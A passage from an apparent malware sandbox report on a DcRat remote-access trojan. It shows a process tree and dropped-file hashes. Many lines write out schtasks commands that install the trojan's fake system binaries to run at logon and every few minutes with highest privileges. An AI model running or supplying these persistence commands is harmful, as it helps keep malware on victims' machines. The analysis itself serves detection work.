                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\winNet\csrss.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4572
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2072
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4664
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3060
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2184
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\Gadgets\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1716
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4068
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1988
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\Accessories\en-US\sihost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2128
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:400
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4704
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4792
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3500
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2108
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2448
                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                      1⤵
                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:6096
                                                                                                                                                      • C:\Windows\System32\MsiExec.exe
                                                                                                                                                        C:\Windows\System32\MsiExec.exe -Embedding 76042A562D6F12C143857389B162EC25
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5168
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding D42F7B75CD86A02C97458B990756F1B8
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5340
                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 7EC7E07C133CC61C77105681E9539DDE E Global\MSI0000
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:2180
                                                                                                                                                        • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                          "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1992
                                                                                                                                                            • C:\Windows\System32\wevtutil.exe
                                                                                                                                                              "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4276
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:2372
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:5368
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:5824
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:5072
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:3160
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                          1⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:1204
                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5128
                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5232
                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5768
                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4056
                                                                                                                                                                • C:\DriversavessessionDlldhcp\lsass.exe
                                                                                                                                                                  C:\DriversavessessionDlldhcp\lsass.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3876
                                                                                                                                                                  • C:\DriversavessessionDlldhcp\lsass.exe.exe
                                                                                                                                                                    "C:\DriversavessessionDlldhcp\lsass.exe.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:12048
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:1508
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:12520
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.7.0.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.7.0.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:8100
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/wiki/Release-notes-for-Bloxstrap-v2.7.0
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:8804
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffc0cdc3cb8,0x7ffc0cdc3cc8,0x7ffc0cdc3cd8
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:8900
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Bloxstrap\Versions\version-3243b6d003cf4642\RobloxPlayerBeta.exe" --app -channel production
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                                                                                          PID:14216
                                                                                                                                                                    • C:\winNet\Registry.exe
                                                                                                                                                                      C:\winNet\Registry.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:10368
                                                                                                                                                                      • C:\winNet\Registry.exe.exe
                                                                                                                                                                        "C:\winNet\Registry.exe.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15912
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15904
                                                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe
                                                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe"
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:10640
                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe.exe
                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\SIGNUP\dllhost.exe.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15920
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15928
                                                                                                                                                                    • C:\Windows\Migration\SolaraBootstrapper.exe
                                                                                                                                                                      C:\Windows\Migration\SolaraBootstrapper.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:10104
                                                                                                                                                                      • C:\Windows\Migration\SolaraBootstrapper.exe.exe
                                                                                                                                                                        "C:\Windows\Migration\SolaraBootstrapper.exe.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15888
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:15896
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:14944
                                                                                                                                                                    • C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe
                                                                                                                                                                      "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe"
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:14916
                                                                                                                                                                      • C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe.exe
                                                                                                                                                                        "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:14840
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:14832
                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:15692
                                                                                                                                                                      • C:\Program Files\Windows NT\Accessories\en-US\sihost.exe
                                                                                                                                                                        "C:\Program Files\Windows NT\Accessories\en-US\sihost.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:16188
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:16116
                                                                                                                                                                        • C:\Program Files\Windows NT\Accessories\en-US\sihost.exe.exe
                                                                                                                                                                          "C:\Program Files\Windows NT\Accessories\en-US\sihost.exe.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:16108
                                                                                                                                                                      • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                                                                        C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:14268
                                                                                                                                                                      • C:\Windows\security\database\conhost.exe
                                                                                                                                                                        C:\Windows\security\database\conhost.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:9172
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:1628
                                                                                                                                                                        • C:\Windows\security\database\conhost.exe.exe
                                                                                                                                                                          "C:\Windows\security\database\conhost.exe.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3316
                                                                                                                                                                      • C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe
                                                                                                                                                                        "C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5528
                                                                                                                                                                        • C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe.exe
                                                                                                                                                                          "C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2488
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:10012
                                                                                                                                                                      • C:\winNet\csrss.exe
                                                                                                                                                                        C:\winNet\csrss.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4232
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:9596
                                                                                                                                                                        • C:\winNet\csrss.exe.exe
                                                                                                                                                                          "C:\winNet\csrss.exe.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:6248
                                                                                                                                                                      • C:\DriversavessessionDlldhcp\lsass.exe
                                                                                                                                                                        C:\DriversavessessionDlldhcp\lsass.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:9644
                                                                                                                                                                        • C:\DriversavessessionDlldhcp\lsass.exe.exe
                                                                                                                                                                          "C:\DriversavessessionDlldhcp\lsass.exe.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:10092
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3336
                                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa3934855 /state1:0x41c64e6d
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:10464

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Config.Msi\e5806f3.rbs

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        4c3545146cf0787ccf2b579c440d00f1

                                                                                                                                                                        SHA1

                                                                                                                                                                        fb3dbdbc8f2b5962ad640a66ebc9ccc5dc8ce494

                                                                                                                                                                        SHA256

                                                                                                                                                                        caf7cfd1b91a9647e0993114b5838722168238ef148df0583c4cfbb3320a93df

                                                                                                                                                                        SHA512

                                                                                                                                                                        19b61c89a1dfd63106052b432e8ce1de02ee9b7a90380eeb76578a29cc464489f1db181bed87d0f53627e2043a3e9f5d30cccac8278216530ab659897901557c

                                                                                                                                                                      • C:\DriversavessessionDlldhcp\Roblox.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.8MB

                                                                                                                                                                        MD5

                                                                                                                                                                        26e388ea32df635cd424decb2bff563e

                                                                                                                                                                        SHA1

                                                                                                                                                                        510ac8024dd524f7ebc92210b189804921fd29ee

                                                                                                                                                                        SHA256

                                                                                                                                                                        cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e

                                                                                                                                                                        SHA512

                                                                                                                                                                        b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

                                                                                                                                                                      • C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat

                                                                                                                                                                        Filesize

                                                                                                                                                                        94B

                                                                                                                                                                        MD5

                                                                                                                                                                        1689f0727433844f3250241e9e030427

                                                                                                                                                                        SHA1

                                                                                                                                                                        bac7909c2a8e7a666edb56a7df07650701d9c013

                                                                                                                                                                        SHA256

                                                                                                                                                                        fa50cc35b05b88a91212dba6ca7cb348368309e9fdfa16273d1adc659f42cdab

                                                                                                                                                                        SHA512

                                                                                                                                                                        d814a8015dcce43a0128c7a5c34998a9a7df03231c5c2b1df169e8986de6e8ec1e77692756ada79f8355abaa50c35ccf5d5f2eaa13c76e02a4dd582ce9c51528

                                                                                                                                                                      • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

                                                                                                                                                                        Filesize

                                                                                                                                                                        239B

                                                                                                                                                                        MD5

                                                                                                                                                                        3492e48fb2e9fb2bfc18658e3d8f88bd

                                                                                                                                                                        SHA1

                                                                                                                                                                        34cec8222aedc8baf774aa863a041a23971c7631

                                                                                                                                                                        SHA256

                                                                                                                                                                        c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e

                                                                                                                                                                        SHA512

                                                                                                                                                                        a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

                                                                                                                                                                      • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d3bc164e23e694c644e0b1ce3e3f9910

                                                                                                                                                                        SHA1

                                                                                                                                                                        1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                                                                                                                                        SHA256

                                                                                                                                                                        1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                                                                                                                                        SHA512

                                                                                                                                                                        91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                                        Filesize

                                                                                                                                                                        818B

                                                                                                                                                                        MD5

                                                                                                                                                                        2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                                        SHA1

                                                                                                                                                                        c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                                        SHA512

                                                                                                                                                                        508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                                        SHA1

                                                                                                                                                                        01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                                        SHA256

                                                                                                                                                                        67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                                        SHA512

                                                                                                                                                                        7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        754B

                                                                                                                                                                        MD5

                                                                                                                                                                        d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                                        SHA1

                                                                                                                                                                        58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                                        SHA512

                                                                                                                                                                        54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                                        Filesize

                                                                                                                                                                        771B

                                                                                                                                                                        MD5

                                                                                                                                                                        e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                                        SHA1

                                                                                                                                                                        f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                                        SHA256

                                                                                                                                                                        b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                                        SHA512

